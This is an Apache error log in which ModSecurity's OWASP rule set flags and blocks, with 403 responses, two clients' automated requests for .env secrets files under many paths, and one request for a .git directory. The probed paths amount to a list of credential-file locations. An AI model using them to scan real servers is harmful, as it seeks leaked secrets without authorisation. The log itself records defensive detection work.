[Fri Nov 28 10:52:20.450555 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSlw1EM6gFne4-slYXlYfgAAABI"]
[Fri Nov 28 10:52:20.450786 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSlw1EM6gFne4-slYXlYfgAAABI"]
[Fri Nov 28 10:52:20.451088 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSlw1EM6gFne4-slYXlYfgAAABI"]
[Fri Nov 28 10:52:20.580209 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSlw1Ohaa_ABFroPvQ_cmgAAABY"]
[Fri Nov 28 10:52:20.580435 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSlw1Ohaa_ABFroPvQ_cmgAAABY"]
[Fri Nov 28 10:52:20.580662 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSlw1Ohaa_ABFroPvQ_cmgAAABY"]
[Fri Nov 28 10:52:20.869361 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSlw1EM6gFne4-slYXlYfwAAABI"]
[Fri Nov 28 10:52:20.869582 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSlw1EM6gFne4-slYXlYfwAAABI"]
[Fri Nov 28 10:52:20.869797 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSlw1EM6gFne4-slYXlYfwAAABI"]
[Fri Nov 28 10:52:21.224084 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSlw1ehaa_ABFroPvQ_cmwAAABY"]
[Fri Nov 28 10:52:21.224311 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSlw1ehaa_ABFroPvQ_cmwAAABY"]
[Fri Nov 28 10:52:21.224553 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSlw1ehaa_ABFroPvQ_cmwAAABY"]
[Fri Nov 28 10:52:21.655987 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSlw1ehaa_ABFroPvQ_cnAAAABY"]
[Fri Nov 28 10:52:21.656216 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSlw1ehaa_ABFroPvQ_cnAAAABY"]
[Fri Nov 28 10:52:21.656405 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSlw1ehaa_ABFroPvQ_cnAAAABY"]
[Fri Nov 28 10:52:21.853255 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSlw1UM6gFne4-slYXlYgAAAABI"]
[Fri Nov 28 10:52:21.853570 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSlw1UM6gFne4-slYXlYgAAAABI"]
[Fri Nov 28 10:52:21.853843 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSlw1UM6gFne4-slYXlYgAAAABI"]
[Fri Nov 28 10:52:22.127624 2025] [:error] [pid 384069] [client 54.93.216.62:38108] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSlw1qdcGzopfH51_3odngAAAAU"]
[Fri Nov 28 10:52:22.130162 2025] [:error] [pid 384069] [client 54.93.216.62:38108] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSlw1qdcGzopfH51_3odngAAAAU"]
[Fri Nov 28 10:52:22.130234 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSlw1uhaa_ABFroPvQ_cnQAAABY"]
[Fri Nov 28 10:52:22.130373 2025] [:error] [pid 384069] [client 54.93.216.62:38108] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSlw1qdcGzopfH51_3odngAAAAU"]
[Fri Nov 28 10:52:22.130478 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSlw1uhaa_ABFroPvQ_cnQAAABY"]
[Fri Nov 28 10:52:22.130654 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSlw1uhaa_ABFroPvQ_cnQAAABY"]
[Fri Nov 28 10:52:22.434035 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSlw1kM6gFne4-slYXlYgQAAABI"]
[Fri Nov 28 10:52:22.434406 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSlw1kM6gFne4-slYXlYgQAAABI"]
[Fri Nov 28 10:52:22.434682 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSlw1kM6gFne4-slYXlYgQAAABI"]
[Fri Nov 28 10:52:23.531892 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSlw1-haa_ABFroPvQ_cnwAAABY"]
[Fri Nov 28 10:52:23.532108 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSlw1-haa_ABFroPvQ_cnwAAABY"]
[Fri Nov 28 10:52:23.532318 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSlw1-haa_ABFroPvQ_cnwAAABY"]
[Fri Nov 28 20:20:16.296042 2025] [:error] [pid 390848] [client 3.150.136.243:53950] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSn18GOTtKlLWoVTP0echwAAAAE"]
[Fri Nov 28 20:20:16.296322 2025] [:error] [pid 390848] [client 3.150.136.243:53950] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSn18GOTtKlLWoVTP0echwAAAAE"]
[Fri Nov 28 20:20:16.296551 2025] [:error] [pid 390848] [client 3.150.136.243:53950] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSn18GOTtKlLWoVTP0echwAAAAE"]
[Fri Nov 28 20:20:16.423258 2025] [authz_core:error] [pid 390799] [client 3.150.136.243:53954] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Nov 28 20:20:16.423681 2025] [:error] [pid 390850] [client 3.150.136.243:53956] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSn18G7uQjKj17P-0y6kdAAAAAM"]
[Fri Nov 28 20:20:16.423928 2025] [:error] [pid 390850] [client 3.150.136.243:53956] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSn18G7uQjKj17P-0y6kdAAAAAM"]
[Fri Nov 28 20:20:16.424118 2025] [:error] [pid 390850] [client 3.150.136.243:53956] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSn18G7uQjKj17P-0y6kdAAAAAM"]
[Fri Nov 28 20:20:16.424957 2025] [:error] [pid 390840] [client 3.150.136.243:53958] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSn18MQLd3r4V3e9CjIb0gAAAAU"]
[Fri Nov 28 20:20:16.425172 2025] [:error] [pid 390840] [client 3.150.136.243:53958] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSn18MQLd3r4V3e9CjIb0gAAAAU"]
[Fri Nov 28 20:20:16.425345 2025] [:error] [pid 390840] [client 3.150.136.243:53958] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSn18MQLd3r4V3e9CjIb0gAAAAU"]
[Fri Nov 28 20:20:16.425763 2025] [:error] [pid 387729] [client 3.150.136.243:53962] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSn18CNGdhATNi61o2H_pQAAABY"]
